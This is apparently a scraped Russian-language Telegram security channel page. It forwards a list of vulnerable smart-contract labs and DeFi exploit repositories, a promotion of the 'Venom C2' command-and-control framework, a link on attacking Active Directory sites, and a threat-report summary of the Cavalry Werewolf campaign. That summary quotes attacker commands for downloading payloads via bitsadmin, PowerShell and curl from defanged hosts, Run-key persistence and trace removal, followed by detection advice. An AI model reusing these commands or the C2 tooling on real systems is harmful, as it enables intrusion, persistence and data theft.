Fsecurity | HH
2.02K subscribers
1.76K photos
108 videos
64 files
6.4K links
Канал про ИБ
Наш Discord: https://discord.gg/Eg8aDS7Hn7
Пожертвовать:
> https://www.donationalerts.com/r/xackapb
Download Telegram
Forwarded from HaHacking
☹️ #web3 #offense #заметки

➡️Что НЕ стоит делать: анти-паттерны разработки смарт-контрактов на Solidity, уязвимые лаборатории и эксплойты для изучения атак на конкретных примерах – всё это в репозиториях ниже:


   🧩 kadenzipfel/smart-contract-vulnerabilities
➡️38 типов уязвимостей, но без контрактов☹️

   🧩   SunWeb3Sec/DeFiVulnLabs
➡️От компании XREX;
➡️48 типов уязвимостей;

   🧩   sigp/solidity-security-blog
➡️От компании Sigma Prime;
➡️18 типов уязвимостей с подробнейшим описанием;
Составляет часть книги Mastering Ethereum;

   🧩   crytic/not-so-smart-contracts
➡️От компании Trail of Bits;
➡️11 типов уязвимостей;
Анализ honeypot'ов: ./honeypots;
Дальше переехали в crytic/building-secure-contracts;

⬜️⬜️⬜️

   🧩   coinspect/learn-evm-attacks
➡️От компании Coinspect;
➡️40 эксплойтов из реальных кейсов‼️

Включают в себя случаи, затронувшие настоящие проекты в период с 2021 года по текущий;

Разбиты по типу проэксплуатированных недостатков:

▪️Access Control [6]
▪️Bad Data Validation [4]
▪️Business Logic [17]
▪️Reentrancy [8]
▪️Bridges [5]


Самые интересные кейсы:

▪️Tornado Cash Governance Takeover (2023) – тут про DELEGATECALL и governance;
▪️Furucombo (2021) – тут тоже про DELEGATECALL;
▪️MBC Token (2022) – тут про токеномику и sandwich атаки;
▪️Uranium (2021) – тут про AMM и формулу x*y=k.



   @HaHacking  🐇
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from 1N73LL1G3NC3
😈 Venom C2

A dependency‑free Python3 Command & Control framework for redteam persistence, built to run on systems without installing packages. It comprises a Flask team server, an Electron operator GUI, and a single‑file Python agent that communicates over HTTP/HTTPS using configurable AES‑encrypted JSON messages. Use it to execute commands, manage files, maintain access, and create SSH reverse tunnels from compromised systems.
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2
Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
Forwarded from Ralf Hacker Channel (Ralf Hacker)
Определенно стоит почитать

https://www.synacktiv.com/en/publications/site-unseen-enumerating-and-attacking-active-directory-sites

Sites did not receive much attention by the Active Directory offensive research community, comparatively to other ACL-based attack vectors. This article aims to demonstrate that not only do attack vectors targeting Active Directory sites exist, but that they can lead to impactful privilege escalation scenarios and to domain(s) compromise.


#ad #pentest #redteam #bloodhound
Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈
Cavalry Werewolf: целевая атака на госсектор РФ

⚙️ Формат атаки
🎯 Фишинг → архив с паролем («Служебная записка», «План работы почтового сервера») → исполняемый файл с бэкдором BackDoor.ShellNET.1 (на основе Reverse-Shell-CS).
После запуска – обратное соединение с C2 и ручное выполнение команд через cmd.exe.
Через него операторы докачивают новые модули через LOLBAS:
bitsadmin /transfer www /download hxxp://ip/winpot.exe C:\Users\Public\Downloads\winpot.exe
Первым ставится Trojan.FileSpyNET.5 – стилер документов, картинок и txt-файлов → IP/fileupper/getupper.php.
Затем – BackDoor.Tunnel.41 (ReverseSocks5) для создания SOCKS5-туннеля и незаметного удалённого доступа.

🧠 Цели и действия атакующего
Атакующие проводят ручную разведку через cmd.exe:
whoami
ipconfig /all
net user
dir C:\Users\<user>\Downloads
dir C:\Users\Public\Pictures
Проверяют сетевые прокси:
[System.Net.WebRequest]::DefaultWebProxy.GetProxy("https://google.com")
Загружают новые модули через PowerShell и curl:
powershell -Command Invoke-WebRequest -Uri "hxxps://sss.qwadx.com/revv3.exe" -OutFile "C:\Users\Public\Pictures\rev.exe"
curl -o C:\Users\Public\Pictures\rev.exe hxxp://IP/code.exe
Закрепление через Run-ключ:
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Service /t REG_SZ /d C:\Users\Public\Pictures\win.exe /f
Удаление следов: powershell -Command Remove-Item C:\Users\Public\Pictures\732.exe.

🧩 Инструменты Cavalry Werewolf
BackDoor.ShellNET.1 / .2
— C#-бэкдоры (Reverse-Shell-CS, Telegram-бот).
BackDoor.ReverseProxy.1 — ReverseSocks5 (Golang), revv2.exe -connect IP:10443.
Trojan.Inject5.57968 — инжект в aspnet_compiler.exe, шифрование RC2 / AES, C2.
Trojan.Packed2.49708 / Siggen31.54011 — лоадеры Spy-бэкдоров с XOR-дешифровкой.
Trojan.Packed2.49862 — троянизированные программы (WinRAR, 7-Zip, VS Code, AkelPad, SumatraPDF) → доставляют AdaptixC2, Havoc, CobaltStrike, Meterpreter, AsyncRAT.
Trojan.Clipper.808 — крадет криптокошельки, копирует себя в %APPDATA%\systemservices\svc_host.exe, добавляет Run-ключ SystemServicesHost, сообщает в Telegram-бот о заменённых адресах.

⛓️‍💥Типовая цепочка действий
1️⃣ Фишинг → BackDoor.ShellNET (обратный шелл).
2️⃣ Разведка: whoami / ipconfig / net user.
3️⃣ Загрузка новых модулей через bitsadmin, PowerShell или curl.
4️⃣ Закрепление через Run-ключ или планировщик.
5️⃣ Инжект в .NET-процесс, маскировка под легитимный aspnet_compiler.exe.
6️⃣ Создание туннелей и Telegram-C2.
7️⃣ Эксфильтрация документов, удаление следов.

🧠 Тактические наблюдения
Массовое использование open-source (Reverse-Shell-CS, ReverseSocks5, AdaptixC2, Havoc).
Telegram-C2 как универсальный контроль вместо доменов.
Мимикрия под госдокументы и троянизированные программы.
Активная LOLBAS-цепочка: bitsadminpowershellcmd.exe.
Хранение и запуск из C:\Users\Public\Pictures|Libraries|Downloads.
Переход от разведки к туннелям и долговременному C2 в одном цикле.

🔍 Что отслеживать
• Исполнение EXE из Public-директорий.
• Bitsadmin с /transfer и URL-адресами.
• PowerShell Invoke-WebRequest → Public-папки.
• Инжект в aspnet_compiler.exe.
• Run-ключи с путём на C:\Users\Public\.
• Трафик к api.telegram.org или подозрительным IP

🔗https://news.drweb.ru/show/?i=15078
🦔 THF
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
Discord сервер
👆🏻Тут можно пообщаться и найти много полезной информации 🦈